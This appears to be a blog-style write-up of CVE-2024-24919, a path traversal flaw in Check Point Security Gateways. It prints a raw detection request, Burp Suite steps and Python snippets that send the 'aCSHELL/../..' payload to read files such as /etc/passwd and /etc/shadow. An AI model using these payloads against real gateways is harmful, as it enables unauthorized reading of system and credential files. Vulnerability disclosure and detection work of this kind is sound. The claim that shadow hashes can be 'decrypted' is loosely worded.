Check Point Security Gateways: CVE-2024–24919
Introduction
Check Point’s security products are designed to protect corporate networks, data, and devices from advanced threats and the exploitation of security weaknesses. They provide comprehensive and advanced security solutions that protect against malware, cyber-attacks, information theft, and exploiting weaknesses.
On May 18, 2024, Check Point disclosed a critical vulnerability (CVE-2024-24919) in Check Point Security Gateways devices (in versions R81.10 and R80.20). The vulnerability allows attackers to read sensitive data from a device without validation (Path Traversal). The vulnerability is considerable due to the large number of affected versions. To be vulnerable, the devices must be connected to the Internet and configured for remote access using either Remote Access VPN or Mobile Access Software Blades.
Earlier versions may also be similarly affected by R81.10 and R80.20 of the Check Point Quantum Security Gateways.
By the searching engine platforms, we can find a lot of devices vulnerable:
Using the Nucli tool for detecting vulnerable devices with requests:
POST /clients/MyCRL HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
aCSHELL/../../../../../../../etc/hosts
How does it work?
Path Traversal is an attack against a server or web application that aims to gain unauthorized access to the file system. In this attack, the attacker identifies websites referencing various pages and files and then tests data validation by inputting different data types.
The attacker sends a POST request to the server in “IP/clients/MyCRL/{path}”, including a path for reading sensitive files.
The vulnerability is based on an unsecured HTTPS connection that uses POST for a few reasons:
– Data hiding: In a POST request, the data is sent in the request’s body rather than as part of the URL.
– Security Policy: The server can be configured with a security policy that only restricts certain call operations to POST requests.
– Server Requirements: Option that the server is configured only to accept POST requests for this specific endpoint.
An attacker can read sensitive files that can help them further exploit the system for an attack:
– “/var/log/messages”: Contains system logs and information about employee actions, system errors, and more.
– “/etc/sudoers”: Contains the permission configuration of the sudo command.
– “ /etc/group“: Contains information about user groups in the system.
– “/etc/passwd”: Contains information about system users.
– “/etc/shadow”: Contains encrypted passwords of system users.
– “/etc/hosts”: Defines relationships between IP addresses and domain names.
How can an attacker exploit it?
With Burp-Suite, we prepare the POST request with the parameters that indicate the path to the sensitive file you want to access.
Once the request is ready, we will use the Repeater tool to send and modify it. By carefully changing the parameters and analyzing the server’s response, we can potentially access sensitive files that are not publicly available.
As we see, the Response from the server displays the “passwd” file from the server, which, with a “shadow” file, can be decrypted for the admin password.
let’s simplify it with a Python code
The code presented is intended to demonstrate the exploitation of a vulnerability using a Path Traversal attack. The check_point function defines the IP address of the server and the path to the file you want to access. After that, it creates the full URL of the server and the content (payload) sent in the POST request. The headers are configured to match the request to the server’s requirements. Using the urllib3 library, the code sends the request and executes the attack.
– we used ‘urllib3’ to Disable insecure SSL zones to avoid insecure connection alerts:
urllib3.disable_warnings(InsecureRequestWarning)
– Building the server URL and payload that tries to access a file on the server:
url = f’https://{ip}/clients/MyCRL’
payload = f’aCSHELL/../../../../../../../../../../..{path}’
– Defining the Headers:
headers = {
‘Host’: ip,
‘User-Agent’: ‘Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0’,
‘Te’: ‘trailers’,
‘Dnt’: ‘1’,
‘Connection’: ‘keep-alive’,
‘Content-Length’: ’48’
}
– Sending a POST request to the URL with the defined payload and headers:
response = http.request(‘POST’, url, body=payload, headers=headers)
The code will display the file that we input for the path in the server.
Summary
This vulnerability has been assigned a CVSS score of 8.6, indicating a high level of severity. The flaw puts a substantial number of devices at risk, providing a potential entry point for malicious actors. Exploitation of this vulnerability could enable attackers to perform a range of harmful activities, primarily focusing on the unauthorized collection of sensitive organizational information. In response to this critical issue, Check Point has promptly released a hotfix that is now available to affected users. Despite the availability of this corrective measure, it is strongly recommended that organizations disconnect the vulnerable devices from their networks until the weakness has been fully addressed. This precautionary step is essential to ensure the security and integrity of organizational data and systems.